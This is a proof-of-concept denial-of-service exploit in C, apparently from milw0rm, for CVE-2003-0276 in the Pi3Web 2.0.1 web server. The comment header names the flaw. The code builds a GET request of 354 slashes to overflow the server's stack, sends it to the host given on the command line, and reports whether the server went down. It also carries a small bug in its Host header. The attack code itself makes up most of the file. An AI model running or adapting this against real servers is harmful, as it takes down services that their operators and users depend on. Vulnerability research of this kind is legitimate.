Pi3Web 2.0.1 - Denial of Service (PoC) - CVE-2003-0276

1. /* Pi3Web 2.0.1 DoS - Pr00f of concept.
2. *
3. * Vulnerable systems: Pi3Web 2.0.1 (maybe others)
4. * Vendor: www.johnroy.com/pi3  - http://pi3web.sourceforge.net/
5. * Patch: no yet.
6. *
7. * Info: Pi3Web Server is vulnerable to a denial of Service.
8. * when a malformed HTTP Request is done the webserver hangs
9. * due to an stack overflow. GET /////////..[354]../////////
10. *
11. * Found by aT4r@3wdesign.es  04/26/2003
12. * Compiled with: lcc-win32 v3.3.
13. *
14. */
15.  
16. #pragma comment (lib,"ws2_32")
17. #include <stdio.h>
18. #include <windows.h>
19. #include <winsock2.h>
20. #include <string.h>
21.  
22. char evilbuffer[1024],evilrequest[512],ip[15];
23. short port=80;
24.  
25.  
26. int isalive(int OPT)
27. {
28.     struct sockaddr_in haxorcitos;
29.     int fd;
30.  
31.     haxorcitos.sin_port = htons(port);
32.     haxorcitos.sin_family = AF_INET;
33.     haxorcitos.sin_addr.s_addr = inet_addr(ip);
34.  
35.     if ((fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
36.     {
37.         printf(" [-] Unable to Create Socket\n\n");
38.         return(0);
39.     }
40.     if (connect(fd,( struct sockaddr *)&haxorcitos,sizeof(haxorcitos)) == -1)
41.     {
42.         if (OPT==0)
43.             printf(" [+] Exploit Success. Remote webserver shutdown\n");
44.         else
45.             printf(" [-] Unable to connect\n\n");
46.         return(0);
47.     }
48.     if (OPT==0)
49.     {
50.         printf(" [-] Exploit Failed. System Patched?\n\n");
51.     }
52.     else
53.     {
54.         send(fd,evilbuffer, strlen(evilbuffer),0);
55.         printf(" [+] Data Sent. Now Checking Host\n");
56.         closesocket(fd);
57.  
58.     }
59. return(1);
60. }
61.  
62.  
63. void usage(void)
64. {
65.     printf(" [+] Usage: PiDoS.exe HOST [port]\n\n");    exit(1);
66. }
67.  
68.  
69. void main(int argc,char *argv[])
70. {
71.     WSADATA ws;
72.  
73.     if  (WSAStartup( MAKEWORD(1,1), &ws )!=0)
74.     {
75.         printf(" [+] WSAStartup() error\n");
76.         exit(0);
77.     }
78.  
79.     printf("\n . .. ...:Pi3Web Denial of Service (aT4r@3wdesign.es) :...
80. ..\n\n");
81.  
82.     if ((argc!=2) && (argc!=3))
83.         usage();
84.  
85.     strcpy(ip,argv[1]);
86.     if (argc==3) port=atoi(argv[2]);
87.  
88.     memset(evilrequest,0,512);
89.     memset(evilbuffer,0,1024);
90.     memset(evilrequest,'/',354);
91.     //sprintf(evilbuffer, "GET %s\r\n",evilrequest);
92.     sprintf(evilbuffer,"GET %s HTTP/1.0\r\nUser-Agent: foo\r\nHost:
93. %s\r\n\r\n\r\n",evilrequest,argv[2]);
94.  
95.     if (isalive(1))
96.         { sleep(1000); isalive(0);}
97.  
98. }
99.  
100. // milw0rm.com [2003-04-29]